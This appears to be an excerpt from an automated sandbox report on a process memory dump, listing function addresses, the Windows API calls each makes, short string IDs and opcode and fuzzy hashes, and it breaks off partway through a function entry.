                                                                                                                                                                                                          • Opcode ID: e905bcb7075b3ffde12d97cbb86947b7ecee93158e4b53cf1fdf11e57d7b5828
                                                                                                                                                                                                          • Instruction ID: d29657cdd308451ad819b70b0710bc7d1770ace047979dc07f2e4ef1020519d4
                                                                                                                                                                                                          • Opcode Fuzzy Hash: e905bcb7075b3ffde12d97cbb86947b7ecee93158e4b53cf1fdf11e57d7b5828
                                                                                                                                                                                                          • Instruction Fuzzy Hash: B7913E75A00205DFCB14DF99C481AAEBBF1FF49314F25815AE805AB312DB35E941CF99
                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                          Function 0044A6E0 Relevance: 7.6, APIs: 4, Strings: 1, Instructions: 84COMMON
                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                          APIs
                                                                                                                                                                                                          Strings
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000004.00000002.12128866195.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_4_2_400000_wab.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: memcpymemset
                                                                                                                                                                                                          • String ID: gj
                                                                                                                                                                                                          • API String ID: 1297977491-4203073231
                                                                                                                                                                                                          • Opcode ID: 33c29578f6527905f4abec1227faf2173c8a70e2811538addd66a8855e8dc5c8
                                                                                                                                                                                                          • Instruction ID: b45f8a370873a883e9703370fbfe8b0477d3556cf02d11e6db591a78d085f858
                                                                                                                                                                                                          • Opcode Fuzzy Hash: 33c29578f6527905f4abec1227faf2173c8a70e2811538addd66a8855e8dc5c8
                                                                                                                                                                                                          • Instruction Fuzzy Hash: 95213DB67403002BE7209A39CC4165B7B6D9FC6318F0A481EF6464B346E67DD605C756
                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                          Function 0040E946 Relevance: 7.6, APIs: 5, Instructions: 60COMMON
                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                          APIs
                                                                                                                                                                                                            • Part of subcall function 0040E8E0: ??3@YAXPAX@Z.MSVCRT ref: 0040E8EC
                                                                                                                                                                                                            • Part of subcall function 0040E8E0: ??3@YAXPAX@Z.MSVCRT ref: 0040E8FA
                                                                                                                                                                                                            • Part of subcall function 0040E8E0: ??3@YAXPAX@Z.MSVCRT ref: 0040E90B
                                                                                                                                                                                                            • Part of subcall function 0040E8E0: ??3@YAXPAX@Z.MSVCRT ref: 0040E922
                                                                                                                                                                                                            • Part of subcall function 0040E8E0: ??3@YAXPAX@Z.MSVCRT ref: 0040E92B
                                                                                                                                                                                                          • ??3@YAXPAX@Z.MSVCRT ref: 0040E961
                                                                                                                                                                                                          • ??3@YAXPAX@Z.MSVCRT ref: 0040E974
                                                                                                                                                                                                          • ??3@YAXPAX@Z.MSVCRT ref: 0040E987
                                                                                                                                                                                                          • ??3@YAXPAX@Z.MSVCRT ref: 0040E99A
                                                                                                                                                                                                          • ??3@YAXPAX@Z.MSVCRT ref: 0040E9D3
                                                                                                                                                                                                            • Part of subcall function 0040AA04: ??3@YAXPAX@Z.MSVCRT ref: 0040AA0B
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000004.00000002.12128866195.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_4_2_400000_wab.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: ??3@
                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                          • API String ID: 613200358-0
                                                                                                                                                                                                          • Opcode ID: 918fb40db202875b378d842bfaa161541e598b9eb5485fff4299785a3e50709c
                                                                                                                                                                                                          • Instruction ID: 098569c1990a85f87ddbd530571c52e66e2f7ba0f471894b996c1416d461d1fd
                                                                                                                                                                                                          • Opcode Fuzzy Hash: 918fb40db202875b378d842bfaa161541e598b9eb5485fff4299785a3e50709c
                                                                                                                                                                                                          • Instruction Fuzzy Hash: 5001A932A01A2097C665BB27A50195EB354BE86B24316896FF844773C1CB3C6C61C6DF
                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                          Function 0041748F Relevance: 7.6, APIs: 5, Instructions: 53COMMON
                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                          APIs
                                                                                                                                                                                                          • AreFileApisANSI.KERNEL32 ref: 00417497
                                                                                                                                                                                                          • WideCharToMultiByte.KERNEL32(00000001,00000000,?,000000FF,00000000,00000000,00000000,00000000), ref: 004174B7
                                                                                                                                                                                                          • malloc.MSVCRT ref: 004174BD
                                                                                                                                                                                                          • WideCharToMultiByte.KERNEL32(00000001,00000000,?,000000FF,00000000,?,00000000,00000000), ref: 004174DB
                                                                                                                                                                                                          • ??3@YAXPAX@Z.MSVCRT ref: 004174E4
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000004.00000002.12128866195.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_4_2_400000_wab.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: ByteCharMultiWide$??3@ApisFilemalloc
                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                          • API String ID: 2903831945-0
                                                                                                                                                                                                          • Opcode ID: 1f9670b26524ddcc1a9c49ebc2632eb8f83c4518f6bd06434b5022e15632c249
                                                                                                                                                                                                          • Instruction ID: 68224c9aa4b31b20fa5037399352f9c2f04b40a845063e8f60522cdb36b448b3
                                                                                                                                                                                                          • Opcode Fuzzy Hash: 1f9670b26524ddcc1a9c49ebc2632eb8f83c4518f6bd06434b5022e15632c249
                                                                                                                                                                                                          • Instruction Fuzzy Hash: DE01A4B150412DBEAF115FA99C80CAF7E7CEA463FC721422AF514E2290DA345E405AB9
                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                          Function 0040D441 Relevance: 7.5, APIs: 5, Instructions: 49COMMON
                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                          APIs
                                                                                                                                                                                                          • GetParent.USER32(?), ref: 0040D453
                                                                                                                                                                                                          • GetWindowRect.USER32(?,?), ref: 0040D460
                                                                                                                                                                                                          • GetClientRect.USER32(00000000,?), ref: 0040D46B
                                                                                                                                                                                                          • MapWindowPoints.USER32(00000000,00000000,?,00000002), ref: 0040D47B
                                                                                                                                                                                                          • SetWindowPos.USER32(?,00000000,?,00000001,00000000,00000000,00000005), ref: 0040D497
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000004.00000002.12128866195.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_4_2_400000_wab.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: Window$Rect$ClientParentPoints
                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                          • API String ID: 4247780290-0
                                                                                                                                                                                                          • Opcode ID: 51bf500d43eb7ed80d01eeab879738f26fa22579f9dd5d7918c8ee0e3f904b1b
                                                                                                                                                                                                          • Instruction ID: 8744084584fea1eb3916f9079d499296a2dd08f7759f51c0708cf8f54c9212ed
                                                                                                                                                                                                          • Opcode Fuzzy Hash: 51bf500d43eb7ed80d01eeab879738f26fa22579f9dd5d7918c8ee0e3f904b1b
                                                                                                                                                                                                          • Instruction Fuzzy Hash: 62018836801129BBDB11EBA6CC49EFFBFBCFF06310F048069F901A2180D778A5018BA5
                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                          Function 00445093 Relevance: 7.5, APIs: 5, Instructions: 46COMMON
                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                          APIs
                                                                                                                                                                                                            • Part of subcall function 004096C3: CreateFileW.KERNELBASE(00000000,80000000,00000003,00000000,00000003,00000000,00000000,0044509F,00000000,?,00000000,00000104,00445E7E,?,?), ref: 004096D5
                                                                                                                                                                                                          • GetFileSize.KERNEL32(00000000,00000000,?,00000000,00000104,00445E7E,?,?,?,?,00000104), ref: 004450AA
                                                                                                                                                                                                          • ??2@YAPAXI@Z.MSVCRT ref: 004450BE
                                                                                                                                                                                                          • memset.MSVCRT ref: 004450CD
                                                                                                                                                                                                            • Part of subcall function 0040A2EF: ReadFile.KERNELBASE(00000000,00000000,004450DD,00000000,00000000,?,?,004450DD,00000000,00000000), ref: 0040A306
                                                                                                                                                                                                          • ??3@YAXPAX@Z.MSVCRT ref: 004450F0
                                                                                                                                                                                                            • Part of subcall function 00444E84: memchr.MSVCRT ref: 00444EBF
                                                                                                                                                                                                            • Part of subcall function 00444E84: memcpy.MSVCRT ref: 00444F63
                                                                                                                                                                                                            • Part of subcall function 00444E84: memcpy.MSVCRT ref: 00444F75
                                                                                                                                                                                                            • Part of subcall function 00444E84: memcpy.MSVCRT ref: 00444F9D
                                                                                                                                                                                                          • CloseHandle.KERNEL32(00000000,?,?,00000104), ref: 004450F7
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000004.00000002.12128866195.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_4_2_400000_wab.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: Filememcpy$??2@??3@CloseCreateHandleReadSizememchrmemset
                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                          • API String ID: 1471605966-0
                                                                                                                                                                                                          • Opcode ID: 2aed10359402c50519c1c236b6adb34ede6eedef97d485569bed8d1556fc9971
                                                                                                                                                                                                          • Instruction ID: af7e2442fb2a0afe256a59df9b01c6fa6c67666c78107f96d02934f32f814c95
                                                                                                                                                                                                          • Opcode Fuzzy Hash: 2aed10359402c50519c1c236b6adb34ede6eedef97d485569bed8d1556fc9971
                                                                                                                                                                                                          • Instruction Fuzzy Hash: D8F0C2765002107BE5207736AC8AEAB3A5CDF96771F11893FF416921D2EE698814C1BD
                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                          Function 0044474A Relevance: 7.5, APIs: 4, Strings: 1, Instructions: 45COMMON
                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                          APIs
                                                                                                                                                                                                          • wcscpy.MSVCRT ref: 0044475F
                                                                                                                                                                                                          • wcscat.MSVCRT ref: 0044476E
                                                                                                                                                                                                          • wcscat.MSVCRT ref: 0044477F
                                                                                                                                                                                                          • wcscat.MSVCRT ref: 0044478E
                                                                                                                                                                                                            • Part of subcall function 004099C6: wcslen.MSVCRT ref: 004099CD
                                                                                                                                                                                                            • Part of subcall function 004099C6: memcpy.MSVCRT ref: 004099E3
                                                                                                                                                                                                            • Part of subcall function 00409A90: lstrcpyW.KERNEL32(?,?), ref: 00409AA5
                                                                                                                                                                                                            • Part of subcall function 00409A90: lstrlenW.KERNEL32(?), ref: 00409AAC
                                                                                                                                                                                                          Strings
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000004.00000002.12128866195.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_4_2_400000_wab.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: wcscat$lstrcpylstrlenmemcpywcscpywcslen
                                                                                                                                                                                                          • String ID: \StringFileInfo\
                                                                                                                                                                                                          • API String ID: 102104167-2245444037
                                                                                                                                                                                                          • Opcode ID: ab9a2aafb99aa2c2dc16e93ced4cdbf5d312534483fca915021789ec54b8a1ce
                                                                                                                                                                                                          • Instruction ID: e4f437c51a7ffcfb72b972a214432876dbdec8abc2c75880463b8380eb377783
                                                                                                                                                                                                          • Opcode Fuzzy Hash: ab9a2aafb99aa2c2dc16e93ced4cdbf5d312534483fca915021789ec54b8a1ce
                                                                                                                                                                                                          • Instruction Fuzzy Hash: 41018FB290021DB6EF10EAA1DC45EDF73BCAB05304F0004B7B514F2052EE38DB969B69
                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                          Function 0040E8E0 Relevance: 7.5, APIs: 5, Instructions: 41COMMON
                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                          APIs
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000004.00000002.12128866195.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_4_2_400000_wab.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: ??3@
                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                          • API String ID: 613200358-0
                                                                                                                                                                                                          • Opcode ID: 7720251f6b3597deba6bb463f6abe47e07af712d95c5f1ebbc7652e386869f9d
                                                                                                                                                                                                          • Instruction ID: 8b058f36177a858601f18eb469b8e3bd7c1df3fc7b9e847ab044313c89d6339d
                                                                                                                                                                                                          • Opcode Fuzzy Hash: 7720251f6b3597deba6bb463f6abe47e07af712d95c5f1ebbc7652e386869f9d
                                                                                                                                                                                                          • Instruction Fuzzy Hash: 98F012B25047015FD760AF6AA8C491BF3E9AB597147668C3FF149D3641CB38FC508A1C
                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                          Function 0040F508 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 73COMMON
                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                          APIs
                                                                                                                                                                                                          Strings
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000004.00000002.12128866195.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_4_2_400000_wab.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: memcpy$??3@
                                                                                                                                                                                                          • String ID: g4@
                                                                                                                                                                                                          • API String ID: 3314356048-2133833424
                                                                                                                                                                                                          • Opcode ID: 8c85e9c0546913db7efdbdbfe2a29cc801ada288f99a1e0c97a35953d22f6614
                                                                                                                                                                                                          • Instruction ID: 6372a4083673351870aa2a156e9431cadfa41d37230e9e7fabcd635cb7c3c96e
                                                                                                                                                                                                          • Opcode Fuzzy Hash: 8c85e9c0546913db7efdbdbfe2a29cc801ada288f99a1e0c97a35953d22f6614
                                                                                                                                                                                                          • Instruction Fuzzy Hash: D2217A30900604EFCB20DF29C94182ABBF5FF447247204A7EE852A3B91E735EE119B04
                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                          Function 0040AAE3 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 44COMMON
                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                          APIs
                                                                                                                                                                                                          Strings
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000004.00000002.12128866195.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_4_2_400000_wab.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: _memicmpwcslen
                                                                                                                                                                                                          • String ID: @@@@$History
                                                                                                                                                                                                          • API String ID: 1872909662-685208920
                                                                                                                                                                                                          • Opcode ID: 3ad5d2c3b3ee2b52e24687d5059668d8296d000cbab4a3a90200832106c23410
                                                                                                                                                                                                          • Instruction ID: 0314511eba11a06c501d0b319d6753a7178557fc2485e08f734f24cb460fdfed
                                                                                                                                                                                                          • Opcode Fuzzy Hash: 3ad5d2c3b3ee2b52e24687d5059668d8296d000cbab4a3a90200832106c23410
                                                                                                                                                                                                          • Instruction Fuzzy Hash: F1F0CD3310471157D210DE199C41A2BF7F8DB813A5F11063FF991A31C2D739EC658657
                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                          Function 004100D7 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 43COMMON
                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                          APIs
                                                                                                                                                                                                          • memset.MSVCRT ref: 004100FB
                                                                                                                                                                                                          • memset.MSVCRT ref: 00410112
                                                                                                                                                                                                            • Part of subcall function 0040F5BE: wcscpy.MSVCRT ref: 0040F5C3
                                                                                                                                                                                                            • Part of subcall function 0040F5BE: _wcslwr.MSVCRT ref: 0040F5FE
                                                                                                                                                                                                          • _snwprintf.MSVCRT ref: 00410141
                                                                                                                                                                                                          Strings
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000004.00000002.12128866195.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_4_2_400000_wab.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: memset$_snwprintf_wcslwrwcscpy
                                                                                                                                                                                                          • String ID: </%s>
                                                                                                                                                                                                          • API String ID: 3400436232-259020660
                                                                                                                                                                                                          • Opcode ID: dc58dcbe4721772b8e09841cb0bf69786816bd9c9006e9a76d773a39c29a63fb
                                                                                                                                                                                                          • Instruction ID: d6b380c41b5e3e458bf6abeca455f552dea24a705517b0a2e3702c553642f250
                                                                                                                                                                                                          • Opcode Fuzzy Hash: dc58dcbe4721772b8e09841cb0bf69786816bd9c9006e9a76d773a39c29a63fb
                                                                                                                                                                                                          • Instruction Fuzzy Hash: 9B01DBF3D0012977D730A755CC46FEA76ACEF45304F0000B6BB08B3186DB78DA458A99
                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                          Function 0040D553 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 39COMMON
                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                          APIs
                                                                                                                                                                                                          • memset.MSVCRT ref: 0040D58D
                                                                                                                                                                                                          • SetWindowTextW.USER32(?,?), ref: 0040D5BD
                                                                                                                                                                                                          • EnumChildWindows.USER32(?,Function_0000D4F5,00000000), ref: 0040D5CD
                                                                                                                                                                                                          Strings
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000004.00000002.12128866195.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_4_2_400000_wab.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: ChildEnumTextWindowWindowsmemset
                                                                                                                                                                                                          • String ID: caption
                                                                                                                                                                                                          • API String ID: 1523050162-4135340389
                                                                                                                                                                                                          • Opcode ID: c23acb22e5a8502154e4be65b33a4ced3ce6ae2c099f2d24681839129fd3d8a7
                                                                                                                                                                                                          • Instruction ID: dcfab03f3ae0740f4c11e1fd8af26e22289cdce227bdcda27870e2dbaf68b2c3
                                                                                                                                                                                                          • Opcode Fuzzy Hash: c23acb22e5a8502154e4be65b33a4ced3ce6ae2c099f2d24681839129fd3d8a7
                                                                                                                                                                                                          • Instruction Fuzzy Hash: 50F08131D0031876FB206B95CC4EB8A3268AB04744F000076BE04B61D2DBB8EA44C69D
                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                          Function 00401137 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 32windowCOMMON
                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                          APIs
                                                                                                                                                                                                            • Part of subcall function 00409BFD: memset.MSVCRT ref: 00409C07
                                                                                                                                                                                                            • Part of subcall function 00409BFD: wcscpy.MSVCRT ref: 00409C47
                                                                                                                                                                                                          • CreateFontIndirectW.GDI32(?), ref: 00401156
                                                                                                                                                                                                          • SendDlgItemMessageW.USER32(?,000003EC,00000030,00000000,00000000), ref: 00401175
                                                                                                                                                                                                          • SendDlgItemMessageW.USER32(?,000003EE,00000030,?,00000000), ref: 00401193
                                                                                                                                                                                                          Strings
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000004.00000002.12128866195.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_4_2_400000_wab.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: ItemMessageSend$CreateFontIndirectmemsetwcscpy
                                                                                                                                                                                                          • String ID: MS Sans Serif
                                                                                                                                                                                                          • API String ID: 210187428-168460110
                                                                                                                                                                                                          • Opcode ID: 0ef3d87a35f2b5fcdfef1a077cef136f9d6d3eb82dfd4d3c6e3e8344e6d66d37
                                                                                                                                                                                                          • Instruction ID: 44e142790c58e2983bb51e892a2c7280827b5342727586ee11fe1c2be2fb852b
                                                                                                                                                                                                          • Opcode Fuzzy Hash: 0ef3d87a35f2b5fcdfef1a077cef136f9d6d3eb82dfd4d3c6e3e8344e6d66d37
                                                                                                                                                                                                          • Instruction Fuzzy Hash: 7CF082B5A4030877EB326BA1DC46F9A77BDBB44B01F040935F721B91D1D3F4A585C658
                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                          Function 00409D7F Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 26COMMON
                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                          APIs
                                                                                                                                                                                                          Strings
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000004.00000002.12128866195.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_4_2_400000_wab.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: ClassName_wcsicmpmemset
                                                                                                                                                                                                          • String ID: edit
                                                                                                                                                                                                          • API String ID: 2747424523-2167791130
                                                                                                                                                                                                          • Opcode ID: 966ba6659df31be0b994ff47204b898d343df69b3f9d85cbf29a1f53eef5b26a
                                                                                                                                                                                                          • Instruction ID: aa36152fd255268de381ae2120198bffa1fffac517830ea88c39a2b7b5867ff0
                                                                                                                                                                                                          • Opcode Fuzzy Hash: 966ba6659df31be0b994ff47204b898d343df69b3f9d85cbf29a1f53eef5b26a
                                                                                                                                                                                                          • Instruction Fuzzy Hash: 86E0D872D8031E6AFB10EBA0DC4AFA977BCFB01708F0001B6B915E10C2EBB496494A45
                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                          Function 00414E13 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 21libraryloaderCOMMON
                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                          APIs
                                                                                                                                                                                                            • Part of subcall function 0040A804: memset.MSVCRT ref: 0040A824
                                                                                                                                                                                                            • Part of subcall function 0040A804: GetSystemDirectoryW.KERNEL32(0045DE68,00000104), ref: 0040A841
                                                                                                                                                                                                            • Part of subcall function 0040A804: wcscpy.MSVCRT ref: 0040A854
                                                                                                                                                                                                            • Part of subcall function 0040A804: wcscat.MSVCRT ref: 0040A86A
                                                                                                                                                                                                            • Part of subcall function 0040A804: LoadLibraryW.KERNELBASE(00000000,?,?,?,?,?,?,?), ref: 0040A87B
                                                                                                                                                                                                            • Part of subcall function 0040A804: LoadLibraryW.KERNEL32(?,?,?,?,?,?,?,?), ref: 0040A884
                                                                                                                                                                                                          • GetProcAddress.KERNEL32(00000000,shlwapi.dll), ref: 00414E2B
                                                                                                                                                                                                          • FreeLibrary.KERNEL32(00000000,?,00405751,00000000), ref: 00414E43
                                                                                                                                                                                                          Strings
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000004.00000002.12128866195.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_4_2_400000_wab.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: Library$Load$AddressDirectoryFreeProcSystemmemsetwcscatwcscpy
                                                                                                                                                                                                          • String ID: SHAutoComplete$shlwapi.dll
                                                                                                                                                                                                          • API String ID: 3150196962-1506664499
                                                                                                                                                                                                          • Opcode ID: cdcb965da711456ca4b51fb43941328c5d6cb5423f9048b51d1f1fd4f659d43f
                                                                                                                                                                                                          • Instruction ID: 56be8aed7d941f739c6f69dc747e21d8edf2639efa9d7e462eda1ee05908af23
                                                                                                                                                                                                          • Opcode Fuzzy Hash: cdcb965da711456ca4b51fb43941328c5d6cb5423f9048b51d1f1fd4f659d43f
                                                                                                                                                                                                          • Instruction Fuzzy Hash: C1D0C2353002315BD6616B27AC04AAF2A99EFC13A1B054035F928D2210DBA84996827D
                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                          Function 0041D893 Relevance: 6.3, APIs: 5, Instructions: 82COMMON
                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                          APIs
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000004.00000002.12128866195.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_4_2_400000_wab.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: memcpy$memcmp
                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                          • API String ID: 3384217055-0
                                                                                                                                                                                                          • Opcode ID: b300709f8a896244993036e355843064c877904d0b203d23fc10c8ecfa49f6ec
                                                                                                                                                                                                          • Instruction ID: f5df6941464580ef2fdae31f27b7f31021858bb2d0e37ec30fcb1df3a02010a9
                                                                                                                                                                                                          • Opcode Fuzzy Hash: b300709f8a896244993036e355843064c877904d0b203d23fc10c8ecfa49f6ec
                                                                                                                                                                                                          • Instruction Fuzzy Hash: 8821B2B2E10249ABDB14EA91DC46EDF73FC9B44704F01442AF512D7181EB28E644C725
                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                          Function 00412A2A Relevance: 6.3, APIs: 5, Instructions: 50COMMON
                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                          APIs
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000004.00000002.12128866195.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_4_2_400000_wab.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: memset$memcpy
                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                          • API String ID: 368790112-0
                                                                                                                                                                                                          • Opcode ID: 97945d52b79a003f2428fc236831fd74eb0a020fff419a73dba27ff1a1f4f0ec
                                                                                                                                                                                                          • Instruction ID: abb90bdd0bd5c960a46cc99acd1c91865272cbbdb433919b32c204757dd19146
                                                                                                                                                                                                          • Opcode Fuzzy Hash: 97945d52b79a003f2428fc236831fd74eb0a020fff419a73dba27ff1a1f4f0ec
                                                                                                                                                                                                          • Instruction Fuzzy Hash: 0201FCB5740B007BF235AB35CC03F9A73A8AF52724F004A1EF153966C2DBF8A554819D
                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                          Function 00410D9B Relevance: 6.2, APIs: 4, Instructions: 169windowCOMMON
                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                          APIs
                                                                                                                                                                                                            • Part of subcall function 004019D8: GetMenu.USER32(?), ref: 004019F6
                                                                                                                                                                                                            • Part of subcall function 004019D8: GetSubMenu.USER32(00000000), ref: 004019FD
                                                                                                                                                                                                            • Part of subcall function 004019D8: EnableMenuItem.USER32(?,?,00000000), ref: 00401A15
                                                                                                                                                                                                            • Part of subcall function 00401A1F: SendMessageW.USER32(?,00000412,?,00000000), ref: 00401A36
                                                                                                                                                                                                            • Part of subcall function 00401A1F: SendMessageW.USER32(?,00000411,?,?), ref: 00401A5A
                                                                                                                                                                                                          • GetMenu.USER32(?), ref: 00410F8D
                                                                                                                                                                                                          • GetSubMenu.USER32(00000000), ref: 00410F9A
